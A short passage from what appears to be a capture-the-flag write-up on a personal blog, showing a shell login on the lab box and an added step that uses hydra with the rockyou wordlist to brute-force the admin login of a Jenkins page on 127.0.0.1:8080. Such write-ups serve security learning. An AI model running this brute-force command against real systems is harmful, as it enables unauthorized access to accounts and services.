lanfran02/lanfran02.github.io/content/posts/Internal/index.en.md

 Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
 aubreanna@internal:~$
 ```
+Hmm, if we now go to `127.0.0.1:8080` we will see the jenkins page requesting credentials, let's use `hydra` to brute force it.

 ```bash
 ╰─ lanfran@parrot ❯ hydra 127.0.0.1 -s 8080 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt